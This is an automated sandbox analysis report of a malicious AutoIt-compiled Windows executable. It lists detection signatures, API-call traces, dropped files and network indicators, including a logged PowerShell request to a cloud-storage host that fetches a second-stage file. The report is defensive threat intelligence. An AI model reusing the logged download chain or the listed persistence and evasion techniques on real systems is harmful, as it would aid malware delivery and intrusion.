Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528956
MD5: 1d2cf62e7874bb460b7258279a55ddf3
SHA1: 9a060f273aee924d7972a5ddd561a34f4510d64d
SHA256: c5378718434462185d98c672106dbfd4efbc8d6b7a0c60efe79000f11c955ffa
Tags: exeuser-Bitsight
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.6% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7978AB7C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00007FF7978B72A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B71F4 FindFirstFileW,FindClose, 0_2_00007FF7978B71F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7978ABC70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00007FF7978BA874
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00007FF7978AC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF7978BA4F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B6428 FindFirstFileW,FindNextFileW,FindClose, 0_2_00007FF7978B6428
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF7978BA350
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797872F50 FindFirstFileExW, 0_2_00007FF797872F50
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_004C4005
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_004C494A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_004CC2FF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CCD14 FindFirstFileW,FindClose, 3_2_004CCD14
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_004CCD9F
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_004CF5D8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_004CF735
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_004CFA36
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_004C3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F84005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8494A GetFileAttributesW,FindFirstFileW,FindClose, 8_2_00F8494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00F8C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 8_2_00F8CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8CD14 FindFirstFileW,FindClose, 8_2_00F8CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00F8FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F83CE2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /v1/ws2/:updatemake/:reality/reality.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: my.cloudme.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BE87C InternetReadFile, 0_2_00007FF7978BE87C
Source: global traffic HTTP traffic detected: GET /v1/ws2/:updatemake/:reality/reality.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: my.cloudme.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: my.cloudme.com
Source: global traffic DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D887000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1809510030.000001C71DC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2033706127.000001C734A92000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2950931190.0000000000529000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2021600603.000001C73479E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co-
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloH
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloudme.com/v1/ws2/:updatemake/:reality/reality.txt
Source: powershell.exe, 00000001.00000002.1809510030.000001C71DC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00007FF7978C0D24
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00007FF7978C0D24
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004D4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_004D4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F94830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_00F94830
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00007FF7978C0A6C
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978A7E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00007FF7978A7E64
Potential key logger detected (key state polling based)
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004ED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 3_2_004ED164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00FAD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 8_2_00FAD164

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\file.exe Code function: This is a third-party compiled AutoIt script. 0_2_00007FF7978337B0
Source: file.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_94912b12-4
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@* memstr_a8c22b00-1
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AC110: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00007FF7978AC110
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock, 0_2_00007FF79789D2C4
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AD750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00007FF7978AD750
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 3_2_004C5778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F85778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 8_2_00F85778
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978CF630 0_2_00007FF7978CF630
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797842E30 0_2_00007FF797842E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978458D0 0_2_00007FF7978458D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79785F8D0 0_2_00007FF79785F8D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79783183C 0_2_00007FF79783183C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797871840 0_2_00007FF797871840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AD87C 0_2_00007FF7978AD87C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978E17C0 0_2_00007FF7978E17C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797861750 0_2_00007FF797861750
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C56A0 0_2_00007FF7978C56A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978695B0 0_2_00007FF7978695B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79783B390 0_2_00007FF79783B390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C32AC 0_2_00007FF7978C32AC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79787529C 0_2_00007FF79787529C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C206C 0_2_00007FF7978C206C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797835F3C 0_2_00007FF797835F3C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79785BEB4 0_2_00007FF79785BEB4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79783BE70 0_2_00007FF79783BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797843C20 0_2_00007FF797843C20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978DDB18 0_2_00007FF7978DDB18
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B1A18 0_2_00007FF7978B1A18
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79784FA4F 0_2_00007FF79784FA4F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79783B9F0 0_2_00007FF79783B9F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978DBA0C 0_2_00007FF7978DBA0C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79786793C 0_2_00007FF79786793C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79786A8A0 0_2_00007FF79786A8A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978767F0 0_2_00007FF7978767F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978DC6D4 0_2_00007FF7978DC6D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978DA59C 0_2_00007FF7978DA59C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978D055C 0_2_00007FF7978D055C
